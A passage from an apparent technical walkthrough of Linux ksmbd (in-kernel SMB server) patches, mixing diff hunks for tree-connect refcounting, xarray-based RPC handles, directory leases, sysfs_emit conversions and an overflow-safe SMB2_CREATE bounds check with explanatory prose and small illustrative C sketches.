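		pthread_cond_signal(&o->released); /* last ref: wake destroyer */
		pthread_mutex_unlock(&o->lock);
	}
}

static void obj_destroy(struct obj *o)       /* disconnect side */
{
	pthread_mutex_lock(&o->lock);
	atomic_fetch_sub(&o->refcount, 1);       /* drop the table's ref */
	while (atomic_load(&o->refcount) != 0)   /* wait out in-flight users */
		pthread_cond_wait(&o->released, &o->lock);
	pthread_mutex_unlock(&o->lock);
	/* no references remain: the object could safely be freed here */
}

static void *user(void *arg)
{
	struct obj *o = arg;                     /* the ref was taken at lookup */
	usleep(1000);                            /* ... use the object ... */
	obj_put(o);
	return NULL;
}

int main(void)
{
	static struct obj o = {
		.lock = PTHREAD_MUTEX_INITIALIZER,
		.released = PTHREAD_COND_INITIALIZER,
	};
	pthread_t t;

	atomic_init(&o.refcount, 1);             /* the table's reference */
	atomic_fetch_add(&o.refcount, 1);        /* a lookup takes another */
	pthread_create(&t, NULL, user, &o);
	obj_destroy(&o);                         /* blocks until the put above */
	pthread_join(t, NULL);
	return 0;
}

As in the kernel version, the waiter re-checks the count in a loop, so the wake-up in obj_put() only needs to fire once the count actually reaches zero.
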
+diff --git a/fs/smb/server/mgmt/tree_connect.h b/fs/smb/server/mgmt/tree_connect.h
+index 700df36cf3e30..6377a70b811c8 100644
+--- a/fs/smb/server/mgmt/tree_connect.h
++++ b/fs/smb/server/mgmt/tree_connect.h
+@@ -14,7 +14,11 @@ struct ksmbd_share_config;
+ struct ksmbd_user;
+ struct ksmbd_conn;
+ 
+-#define TREE_CONN_EXPIRE		1
++enum {
++	TREE_NEW = 0,
++	TREE_CONNECTED,
++	TREE_DISCONNECTED
++};
+ 
+ struct ksmbd_tree_connect {
+ 	int				id;
+@@ -27,7 +31,9 @@ struct ksmbd_tree_connect {
+ 
+ 	int				maximal_access;
+ 	bool				posix_extensions;
+-	unsigned long			status;
++	atomic_t			refcount;
++	wait_queue_head_t		refcount_q;
++	unsigned int			t_state;
+ };
+ 
+ struct ksmbd_tree_conn_status {
+@@ -46,6 +52,7 @@ struct ksmbd_session;
+ struct ksmbd_tree_conn_status
+ ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+ 			const char *share_name);
++void ksmbd_tree_connect_put(struct ksmbd_tree_connect *tcon);
+ 
+ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ 			       struct ksmbd_tree_connect *tree_conn);
+@@ -53,9 +60,6 @@ int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+ struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+ 						  unsigned int id);
+ 
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id);
+-
+ int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess);
+ 
+ #endif /* __TREE_CONNECT_MANAGEMENT_H__ */
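
With the TREE_CONN_EXPIRE bit gone, a tree connect now moves TREE_NEW -> TREE_CONNECTED -> TREE_DISCONNECTED under tree_conns_lock, and two paths (tree disconnect and session logoff) race to perform the teardown. Here is a consolidated sketch of the disconnect-once gate both paths implement; this helper does not exist in the patch, it merely restates the locking pattern using the fields added above:

/* Sketch only: returns true for the caller that wins the transition
 * and therefore owns the rest of the teardown. */
static bool tree_conn_mark_disconnected(struct ksmbd_session *sess,
					struct ksmbd_tree_connect *tcon)
{
	bool won;

	write_lock(&sess->tree_conns_lock);
	won = (tcon->t_state != TREE_DISCONNECTED);
	if (won)
		tcon->t_state = TREE_DISCONNECTED;
	write_unlock(&sess->tree_conns_lock);
	return won;
}

Lookups take the same lock for reading, which is why ksmbd_tree_conn_lookup() can safely refuse anything that is not TREE_CONNECTED.
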
+diff --git a/fs/smb/server/mgmt/user_config.h b/fs/smb/server/mgmt/user_config.h
+index 6a44109617f14..e068a19fd9049 100644
+--- a/fs/smb/server/mgmt/user_config.h
++++ b/fs/smb/server/mgmt/user_config.h
+@@ -18,7 +18,6 @@ struct ksmbd_user {
+ 
+ 	size_t			passkey_sz;
+ 	char			*passkey;
+-	unsigned int		failed_login_count;
+ };
+ 
+ static inline bool user_guest(struct ksmbd_user *user)
+diff --git a/fs/smb/server/mgmt/user_session.c b/fs/smb/server/mgmt/user_session.c
+index cf6621e21ba36..15f68ee050894 100644
+--- a/fs/smb/server/mgmt/user_session.c
++++ b/fs/smb/server/mgmt/user_session.c
+@@ -25,7 +25,6 @@ static DECLARE_RWSEM(sessions_table_lock);
+ struct ksmbd_session_rpc {
+ 	int			id;
+ 	unsigned int		method;
+-	struct list_head	list;
+ };
+ 
+ static void free_channel_list(struct ksmbd_session *sess)
+@@ -58,15 +57,14 @@ static void __session_rpc_close(struct ksmbd_session *sess,
+ static void ksmbd_session_rpc_clear_list(struct ksmbd_session *sess)
+ {
+ 	struct ksmbd_session_rpc *entry;
++	long index;
+ 
+-	while (!list_empty(&sess->rpc_handle_list)) {
+-		entry = list_entry(sess->rpc_handle_list.next,
+-				   struct ksmbd_session_rpc,
+-				   list);
+-
+-		list_del(&entry->list);
++	xa_for_each(&sess->rpc_handle_list, index, entry) {
++		xa_erase(&sess->rpc_handle_list, index);
+ 		__session_rpc_close(sess, entry);
+ 	}
++
++	xa_destroy(&sess->rpc_handle_list);
+ }
+ 
+ static int __rpc_method(char *rpc_name)
+@@ -102,13 +100,13 @@ int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+ 
+ 	entry = kzalloc(sizeof(struct ksmbd_session_rpc), GFP_KERNEL);
+ 	if (!entry)
+-		return -EINVAL;
++		return -ENOMEM;
+ 
+-	list_add(&entry->list, &sess->rpc_handle_list);
+ 	entry->method = method;
+ 	entry->id = ksmbd_ipc_id_alloc();
+ 	if (entry->id < 0)
+ 		goto free_entry;
++	xa_store(&sess->rpc_handle_list, entry->id, entry, GFP_KERNEL);
+ 
+ 	resp = ksmbd_rpc_open(sess, entry->id);
+ 	if (!resp)
+@@ -117,9 +115,9 @@ int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+ 	kvfree(resp);
+ 	return entry->id;
+ free_id:
++	xa_erase(&sess->rpc_handle_list, entry->id);
+ 	ksmbd_rpc_id_free(entry->id);
+ free_entry:
+-	list_del(&entry->list);
+ 	kfree(entry);
+ 	return -EINVAL;
+ }
+@@ -128,24 +126,17 @@ void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id)
+ {
+ 	struct ksmbd_session_rpc *entry;
+ 
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id) {
+-			list_del(&entry->list);
+-			__session_rpc_close(sess, entry);
+-			break;
+-		}
+-	}
++	entry = xa_erase(&sess->rpc_handle_list, id);
++	if (entry)
++		__session_rpc_close(sess, entry);
+ }
+ 
+ int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id)
+ {
+ 	struct ksmbd_session_rpc *entry;
+ 
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id)
+-			return entry->method;
+-	}
+-	return 0;
++	entry = xa_load(&sess->rpc_handle_list, id);
++	return entry ? entry->method : 0;
+ }
+ 
+ void ksmbd_session_destroy(struct ksmbd_session *sess)
+@@ -362,8 +353,9 @@ static struct ksmbd_session *__session_create(int protocol)
+ 	set_session_flag(sess, protocol);
+ 	xa_init(&sess->tree_conns);
+ 	xa_init(&sess->ksmbd_chann_list);
+-	INIT_LIST_HEAD(&sess->rpc_handle_list);
++	xa_init(&sess->rpc_handle_list);
+ 	sess->sequence_number = 1;
++	rwlock_init(&sess->tree_conns_lock);
+ 
+ 	ret = __init_smb2_session(sess);
+ 	if (ret)
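
Switching rpc_handle_list from a linked list to an xarray makes the IPC handle id itself the lookup key, so ksmbd_session_rpc_close() and ksmbd_session_rpc_method() become indexed loads instead of list walks. A kernel-style sketch of the resulting access pattern (illustrative, not the ksmbd code):

#include <linux/slab.h>
#include <linux/xarray.h>

struct handle {
	int id;
	unsigned int method;
};

static DEFINE_XARRAY(handles);

static int handle_open(struct handle *h, gfp_t gfp)
{
	/* the id doubles as the xarray index */
	return xa_err(xa_store(&handles, h->id, h, gfp));
}

static unsigned int handle_method(int id)
{
	struct handle *h = xa_load(&handles, id);

	return h ? h->method : 0;	/* O(log n) load, no list walk */
}

static void handle_close(int id)
{
	struct handle *h = xa_erase(&handles, id);

	kfree(h);
}
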
+diff --git a/fs/smb/server/mgmt/user_session.h b/fs/smb/server/mgmt/user_session.h
+index 51f38e5b61abb..63cb08fffde84 100644
+--- a/fs/smb/server/mgmt/user_session.h
++++ b/fs/smb/server/mgmt/user_session.h
+@@ -52,7 +52,7 @@ struct ksmbd_session {
+ 	struct xarray			ksmbd_chann_list;
+ 	struct xarray			tree_conns;
+ 	struct ida			tree_conn_ida;
+-	struct list_head		rpc_handle_list;
++	struct xarray			rpc_handle_list;
+ 
+ 	__u8				smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+ 	__u8				smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+@@ -60,6 +60,7 @@ struct ksmbd_session {
+ 
+ 	struct ksmbd_file_table		file_table;
+ 	unsigned long			last_active;
++	rwlock_t			tree_conns_lock;
+ };
+ 
+ static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index c81aee9ce7ec4..af0f6914eca45 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -102,9 +102,10 @@ static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
+ 	lease->new_state = 0;
+ 	lease->flags = lctx->flags;
+ 	lease->duration = lctx->duration;
++	lease->is_dir = lctx->is_dir;
+ 	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
+ 	lease->version = lctx->version;
+-	lease->epoch = 0;
++	lease->epoch = le16_to_cpu(lctx->epoch);
+ 	INIT_LIST_HEAD(&opinfo->lease_entry);
+ 	opinfo->o_lease = lease;
+ 
+@@ -395,8 +396,8 @@ void close_id_del_oplock(struct ksmbd_file *fp)
+ {
+ 	struct oplock_info *opinfo;
+ 
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return;
++	if (fp->reserve_lease_break)
++		smb_lazy_parent_lease_break_close(fp);
+ 
+ 	opinfo = opinfo_get(fp);
+ 	if (!opinfo)
+@@ -543,12 +544,13 @@ static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+ 			/* upgrading lease */
+ 			if ((atomic_read(&ci->op_count) +
+ 			     atomic_read(&ci->sop_count)) == 1) {
+-				if (lease->state ==
+-				    (lctx->req_state & lease->state)) {
++				if (lease->state != SMB2_LEASE_NONE_LE &&
++				    lease->state == (lctx->req_state & lease->state)) {
+ 					lease->state |= lctx->req_state;
+ 					if (lctx->req_state &
+ 						SMB2_LEASE_WRITE_CACHING_LE)
+ 						lease_read_to_write(opinfo);
++
+ 				}
+ 			} else if ((atomic_read(&ci->op_count) +
+ 				    atomic_read(&ci->sop_count)) > 1) {
+@@ -616,15 +618,6 @@ static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+ 	return 0;
+ }
+ 
+-static inline int allocate_oplock_break_buf(struct ksmbd_work *work)
+-{
+-	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
+-	if (!work->response_buf)
+-		return -ENOMEM;
+-	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-	return 0;
+-}
+-
+ /**
+  * __smb2_oplock_break_noti() - send smb2 oplock break cmd from conn
+  * to client
+@@ -639,7 +632,6 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ {
+ 	struct smb2_oplock_break *rsp = NULL;
+ 	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct ksmbd_conn *conn = work->conn;
+ 	struct oplock_break_info *br_info = work->request_buf;
+ 	struct smb2_hdr *rsp_hdr;
+ 	struct ksmbd_file *fp;
+@@ -648,7 +640,7 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 	if (!fp)
+ 		goto out;
+ 
+-	if (allocate_oplock_break_buf(work)) {
++	if (allocate_interim_rsp_buf(work)) {
+ 		pr_err("smb2_allocate_rsp_buf failed! ");
+ 		ksmbd_fd_put(work, fp);
+ 		goto out;
+@@ -656,8 +648,6 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 
+ 	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+ 	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+ 	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+ 	rsp_hdr->CreditRequest = cpu_to_le16(0);
+@@ -684,13 +674,15 @@ static void __smb2_oplock_break_noti(struct work_struct *wk)
+ 	rsp->PersistentFid = fp->persistent_id;
+ 	rsp->VolatileFid = fp->volatile_id;
+ 
+-	inc_rfc1001_len(work->response_buf, 24);
++	ksmbd_fd_put(work, fp);
++	if (ksmbd_iov_pin_rsp(work, (void *)rsp,
++			      sizeof(struct smb2_oplock_break)))
++		goto out;
+ 
+ 	ksmbd_debug(OPLOCK,
+ 		    "sending oplock break v_id %llu p_id = %llu lock level = %d\n",
+ 		    rsp->VolatileFid, rsp->PersistentFid, rsp->OplockLevel);
+ 
+-	ksmbd_fd_put(work, fp);
+ 	ksmbd_conn_write(work);
+ 
+ out:
+@@ -751,18 +743,15 @@ static void __smb2_lease_break_noti(struct work_struct *wk)
+ 	struct smb2_lease_break *rsp = NULL;
+ 	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+ 	struct lease_break_info *br_info = work->request_buf;
+-	struct ksmbd_conn *conn = work->conn;
+ 	struct smb2_hdr *rsp_hdr;
+ 
+-	if (allocate_oplock_break_buf(work)) {
++	if (allocate_interim_rsp_buf(work)) {
+ 		ksmbd_debug(OPLOCK, "smb2_allocate_rsp_buf failed! ");
+ 		goto out;
+ 	}
+ 
+ 	rsp_hdr = smb2_get_msg(work->response_buf);
+ 	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+ 	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+ 	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+ 	rsp_hdr->CreditRequest = cpu_to_le16(0);
+@@ -791,7 +780,9 @@ static void __smb2_lease_break_noti(struct work_struct *wk)
+ 	rsp->AccessMaskHint = 0;
+ 	rsp->ShareMaskHint = 0;
+ 
+-	inc_rfc1001_len(work->response_buf, 44);
++	if (ksmbd_iov_pin_rsp(work, (void *)rsp,
++			      sizeof(struct smb2_lease_break)))
++		goto out;
+ 
+ 	ksmbd_conn_write(work);
+ 
+@@ -844,7 +835,8 @@ static int smb2_lease_break_noti(struct oplock_info *opinfo)
+ 					     interim_entry);
+ 			setup_async_work(in_work, NULL, NULL);
+ 			smb2_send_interim_resp(in_work, STATUS_PENDING);
+-			list_del(&in_work->interim_entry);
++			list_del_init(&in_work->interim_entry);
++			release_async_work(in_work);
+ 		}
+ 		INIT_WORK(&work->work, __smb2_lease_break_noti);
+ 		ksmbd_queue_work(work);
+@@ -910,7 +902,8 @@ static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
+ 					lease->new_state =
+ 						SMB2_LEASE_READ_CACHING_LE;
+ 			} else {
+-				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
++				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE &&
++						!lease->is_dir)
+ 					lease->new_state =
+ 						SMB2_LEASE_READ_CACHING_LE;
+ 				else
+@@ -1042,6 +1035,7 @@ static void copy_lease(struct oplock_info *op1, struct oplock_info *op2)
+ 	       SMB2_LEASE_KEY_SIZE);
+ 	lease2->duration = lease1->duration;
+ 	lease2->flags = lease1->flags;
++	lease2->epoch = lease1->epoch++;
+ }
+ 
+ static int add_lease_global_list(struct oplock_info *opinfo)
+@@ -1091,6 +1085,89 @@ static void set_oplock_level(struct oplock_info *opinfo, int level,
+ 	}
+ }
+ 
++void smb_send_parent_lease_break_noti(struct ksmbd_file *fp,
++				      struct lease_ctx_info *lctx)
++{
++	struct oplock_info *opinfo;
++	struct ksmbd_inode *p_ci = NULL;
++
++	if (lctx->version != 2)
++		return;
++
++	p_ci = ksmbd_inode_lookup_lock(fp->filp->f_path.dentry->d_parent);
++	if (!p_ci)
++		return;
++
++	read_lock(&p_ci->m_lock);
++	list_for_each_entry(opinfo, &p_ci->m_op_list, op_entry) {
++		if (!opinfo->is_lease)
++			continue;
++
++		if (opinfo->o_lease->state != SMB2_OPLOCK_LEVEL_NONE &&
++		    (!(lctx->flags & SMB2_LEASE_FLAG_PARENT_LEASE_KEY_SET_LE) ||
++		     !compare_guid_key(opinfo, fp->conn->ClientGUID,
++				      lctx->parent_lease_key))) {
++			if (!atomic_inc_not_zero(&opinfo->refcount))
++				continue;
++
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				continue;
++			}
++
++			read_unlock(&p_ci->m_lock);
++			oplock_break(opinfo, SMB2_OPLOCK_LEVEL_NONE);
++			opinfo_conn_put(opinfo);
++			read_lock(&p_ci->m_lock);
++		}
++	}
++	read_unlock(&p_ci->m_lock);
++
++	ksmbd_inode_put(p_ci);
++}
++
++void smb_lazy_parent_lease_break_close(struct ksmbd_file *fp)
++{
++	struct oplock_info *opinfo;
++	struct ksmbd_inode *p_ci = NULL;
++
++	rcu_read_lock();
++	opinfo = rcu_dereference(fp->f_opinfo);
++	rcu_read_unlock();
++
++	if (!opinfo->is_lease || opinfo->o_lease->version != 2)
++		return;
++
++	p_ci = ksmbd_inode_lookup_lock(fp->filp->f_path.dentry->d_parent);
++	if (!p_ci)
++		return;
++
++	read_lock(&p_ci->m_lock);
++	list_for_each_entry(opinfo, &p_ci->m_op_list, op_entry) {
++		if (!opinfo->is_lease)
++			continue;
++
++		if (opinfo->o_lease->state != SMB2_OPLOCK_LEVEL_NONE) {
++			if (!atomic_inc_not_zero(&opinfo->refcount))
++				continue;
++
++			atomic_inc(&opinfo->conn->r_count);
++			if (ksmbd_conn_releasing(opinfo->conn)) {
++				atomic_dec(&opinfo->conn->r_count);
++				continue;
++			}
++			read_unlock(&p_ci->m_lock);
++			oplock_break(opinfo, SMB2_OPLOCK_LEVEL_NONE);
++			opinfo_conn_put(opinfo);
++			read_lock(&p_ci->m_lock);
++		}
++	}
++	read_unlock(&p_ci->m_lock);
++
++	ksmbd_inode_put(p_ci);
++}
++
+ /**
+  * smb_grant_oplock() - handle oplock/lease request on file open
+  * @work:		smb work
+@@ -1114,10 +1191,6 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	bool prev_op_has_lease;
+ 	__le32 prev_op_state = 0;
+ 
+-	/* not support directory lease */
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return 0;
+-
+ 	opinfo = alloc_opinfo(work, pid, tid);
+ 	if (!opinfo)
+ 		return -ENOMEM;
+@@ -1374,6 +1447,7 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ 		memcpy(buf->lcontext.LeaseKey, lease->lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+ 		buf->lcontext.LeaseFlags = lease->flags;
++		buf->lcontext.Epoch = cpu_to_le16(++lease->epoch);
+ 		buf->lcontext.LeaseState = lease->state;
+ 		memcpy(buf->lcontext.ParentLeaseKey, lease->parent_lease_key,
+ 		       SMB2_LEASE_KEY_SIZE);
+@@ -1410,10 +1484,11 @@ void create_lease_buf(u8 *rbuf, struct lease *lease)
+ /**
+  * parse_lease_state() - parse lease context contained in file open request
+  * @open_req:	buffer containing smb2 file open(create) request
++ * @is_dir:	whether leasing file is directory
+  *
+  * Return:  oplock state, -ENOENT if create lease context not found
+  */
+-struct lease_ctx_info *parse_lease_state(void *open_req)
++struct lease_ctx_info *parse_lease_state(void *open_req, bool is_dir)
+ {
+ 	struct create_context *cc;
+ 	struct smb2_create_req *req = (struct smb2_create_req *)open_req;
+@@ -1431,8 +1506,14 @@ struct lease_ctx_info *parse_lease_state(void *open_req)
+ 		struct create_lease_v2 *lc = (struct create_lease_v2 *)cc;
+ 
+ 		memcpy(lreq->lease_key, lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-		lreq->req_state = lc->lcontext.LeaseState;
++		if (is_dir) {
++			lreq->req_state = lc->lcontext.LeaseState &
++				~SMB2_LEASE_WRITE_CACHING_LE;
++			lreq->is_dir = true;
++		} else
++			lreq->req_state = lc->lcontext.LeaseState;
+ 		lreq->flags = lc->lcontext.LeaseFlags;
++		lreq->epoch = lc->lcontext.Epoch;
+ 		lreq->duration = lc->lcontext.LeaseDuration;
+ 		memcpy(lreq->parent_lease_key, lc->lcontext.ParentLeaseKey,
+ 				SMB2_LEASE_KEY_SIZE);
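
The parse_lease_state() change above encodes the rule that a directory lease may cache reads and handles but never writes, so SMB2_LEASE_WRITE_CACHING_LE is stripped from the requested state when the open targets a directory. A small compilable check of that masking; the flag values below are stand-ins for the little-endian protocol constants:

#include <assert.h>

/* stand-in values; the real constants are __le32 protocol bits */
#define LEASE_READ    0x01u
#define LEASE_HANDLE  0x02u
#define LEASE_WRITE   0x04u

static unsigned int requested_lease(unsigned int wire_state, int is_dir)
{
	/* directories may never cache writes */
	return is_dir ? wire_state & ~LEASE_WRITE : wire_state;
}

int main(void)
{
	unsigned int rwh = LEASE_READ | LEASE_WRITE | LEASE_HANDLE;

	assert(requested_lease(rwh, 0) == rwh);
	assert(requested_lease(rwh, 1) == (LEASE_READ | LEASE_HANDLE));
	return 0;
}
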
+diff --git a/fs/smb/server/oplock.h b/fs/smb/server/oplock.h
+index 4b0fe6da76940..5b93ea9196c01 100644
+--- a/fs/smb/server/oplock.h
++++ b/fs/smb/server/oplock.h
+@@ -34,7 +34,9 @@ struct lease_ctx_info {
+ 	__le32			flags;
+ 	__le64			duration;
+ 	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
++	__le16			epoch;
+ 	int			version;
++	bool			is_dir;
+ };
+ 
+ struct lease_table {
+@@ -53,6 +55,7 @@ struct lease {
+ 	__u8			parent_lease_key[SMB2_LEASE_KEY_SIZE];
+ 	int			version;
+ 	unsigned short		epoch;
++	bool			is_dir;
+ 	struct lease_table	*l_lb;
+ };
+ 
+@@ -108,7 +111,7 @@ void opinfo_put(struct oplock_info *opinfo);
+ 
+ /* Lease related functions */
+ void create_lease_buf(u8 *rbuf, struct lease *lease);
+-struct lease_ctx_info *parse_lease_state(void *open_req);
++struct lease_ctx_info *parse_lease_state(void *open_req, bool is_dir);
+ __u8 smb2_map_lease_to_oplock(__le32 lease_state);
+ int lease_read_to_write(struct oplock_info *opinfo);
+ 
+@@ -124,4 +127,7 @@ struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+ int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+ 			struct lease_ctx_info *lctx);
+ void destroy_lease_table(struct ksmbd_conn *conn);
++void smb_send_parent_lease_break_noti(struct ksmbd_file *fp,
++				      struct lease_ctx_info *lctx);
++void smb_lazy_parent_lease_break_close(struct ksmbd_file *fp);
+ #endif /* __KSMBD_OPLOCK_H */
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+index 9804cabe72a84..11b201e6ee44b 100644
+--- a/fs/smb/server/server.c
++++ b/fs/smb/server/server.c
+@@ -115,8 +115,10 @@ static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
+ 	if (check_conn_state(work))
+ 		return SERVER_HANDLER_CONTINUE;
+ 
+-	if (ksmbd_verify_smb_message(work))
++	if (ksmbd_verify_smb_message(work)) {
++		conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
+ 		return SERVER_HANDLER_ABORT;
++	}
+ 
+ 	command = conn->ops->get_cmd_val(work);
+ 	*cmd = command;
+@@ -163,6 +165,7 @@ static void __handle_ksmbd_work(struct ksmbd_work *work,
+ {
+ 	u16 command = 0;
+ 	int rc;
++	bool is_chained = false;
+ 
+ 	if (conn->ops->allocate_rsp_buf(work))
+ 		return;
+@@ -229,16 +232,17 @@ static void __handle_ksmbd_work(struct ksmbd_work *work,
+ 			}
+ 		}
+ 
++		is_chained = is_chained_smb2_message(work);
++
+ 		if (work->sess &&
+ 		    (work->sess->sign || smb3_11_final_sess_setup_resp(work) ||
+ 		     conn->ops->is_sign_req(work, command)))
+ 			conn->ops->set_sign_rsp(work);
+-	} while (is_chained_smb2_message(work));
+-
+-	if (work->send_no_response)
+-		return;
++	} while (is_chained == true);
+ 
+ send:
++	if (work->tcon)
++		ksmbd_tree_connect_put(work->tcon);
+ 	smb3_preauth_hash_rsp(work);
+ 	if (work->sess && work->sess->enc && work->encrypted &&
+ 	    conn->ops->encrypt_resp) {
+@@ -442,11 +446,9 @@ static ssize_t stats_show(struct class *class, struct class_attribute *attr,
+ 		"reset",
+ 		"shutdown"
+ 	};
+-
+-	ssize_t sz = scnprintf(buf, PAGE_SIZE, "%d %s %d %lu\n", stats_version,
+-			       state[server_conf.state], server_conf.tcp_port,
+-			       server_conf.ipc_last_active / HZ);
+-	return sz;
++	return sysfs_emit(buf, "%d %s %d %lu\n", stats_version,
++			  state[server_conf.state], server_conf.tcp_port,
++			  server_conf.ipc_last_active / HZ);
+ }
+ 
+ static ssize_t kill_server_store(struct class *class,
+@@ -478,19 +480,13 @@ static ssize_t debug_show(struct class *class, struct class_attribute *attr,
+ 
+ 	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
+ 		if ((ksmbd_debug_types >> i) & 1) {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"[%s] ",
+-					debug_type_strings[i]);
++			pos = sysfs_emit_at(buf, sz, "[%s] ", debug_type_strings[i]);
+ 		} else {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"%s ",
+-					debug_type_strings[i]);
++			pos = sysfs_emit_at(buf, sz, "%s ", debug_type_strings[i]);
+ 		}
+ 		sz += pos;
+ 	}
+-	sz += scnprintf(buf + sz, PAGE_SIZE - sz, "\n");
++	sz += sysfs_emit_at(buf, sz, "\n");
+ 	return sz;
+ }
+ 
+@@ -599,8 +595,6 @@ static int __init ksmbd_server_init(void)
+ 	if (ret)
+ 		goto err_crypto_destroy;
+ 
+-	pr_warn_once("The ksmbd server is experimental\n");
+-
+ 	return 0;
+ 
+ err_crypto_destroy:
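
stats_show() and debug_show() above move from hand-rolled scnprintf() against PAGE_SIZE to sysfs_emit()/sysfs_emit_at(), which carry the one-page sysfs contract internally and warn on misuse. A kernel-style sketch of the multi-item pattern, mirroring the converted debug_show(); the attribute and names here are invented for illustration:

static ssize_t flags_show(struct class *class, struct class_attribute *attr,
			  char *buf)
{
	static const char * const names[] = { "smb", "auth", "vfs" };
	ssize_t sz = 0;
	int i;

	/* sysfs_emit_at() bounds-checks against PAGE_SIZE internally,
	 * so no explicit "PAGE_SIZE - sz" arithmetic is needed */
	for (i = 0; i < ARRAY_SIZE(names); i++)
		sz += sysfs_emit_at(buf, sz, "%s ", names[i]);
	sz += sysfs_emit_at(buf, sz, "\n");
	return sz;
}
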
+diff --git a/fs/smb/server/smb2misc.c b/fs/smb/server/smb2misc.c
+index e881df1d10cbd..03dded29a9804 100644
+--- a/fs/smb/server/smb2misc.c
++++ b/fs/smb/server/smb2misc.c
+@@ -106,16 +106,25 @@ static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+ 		break;
+ 	case SMB2_CREATE:
+ 	{
++		unsigned short int name_off =
++			le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
++		unsigned short int name_len =
++			le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
++
+ 		if (((struct smb2_create_req *)hdr)->CreateContextsLength) {
+ 			*off = le32_to_cpu(((struct smb2_create_req *)
+ 				hdr)->CreateContextsOffset);
+ 			*len = le32_to_cpu(((struct smb2_create_req *)
+ 				hdr)->CreateContextsLength);
+-			break;
++			if (!name_len)
++				break;
++
++			if (name_off + name_len < (u64)*off + *len)
++				break;
+ 		}
+ 
+-		*off = le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
+-		*len = le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
++		*off = name_off;
++		*len = name_len;
+ 		break;
+ 	}
+ 	case SMB2_QUERY_INFO:
+@@ -440,10 +449,8 @@ int ksmbd_smb2_check_message(struct ksmbd_work *work)
+ 
+ validate_credit:
+ 	if ((work->conn->vals->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU) &&
+-	    smb2_validate_credit_charge(work->conn, hdr)) {
+-		work->conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
++	    smb2_validate_credit_charge(work->conn, hdr))
+ 		return 1;
+-	}
+ 
+ 	return 0;
+ }
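
In the SMB2_CREATE length check above, the (u64) cast matters: without it a crafted CreateContextsOffset/Length pair could wrap the 32-bit sum and slip past the comparison. A compilable illustration of the wraparound:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t off = 0xfffffff0u, len = 0x100;   /* crafted to overflow */

	/* 32-bit sum wraps: the region appears to end at 0xf0 */
	printf("32-bit end: 0x%x\n", off + len);

	/* widening before the add preserves the true end of the region */
	printf("64-bit end: 0x%llx\n", (unsigned long long)off + len);
	return 0;
}
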
+diff --git a/fs/smb/server/smb2ops.c b/fs/smb/server/smb2ops.c
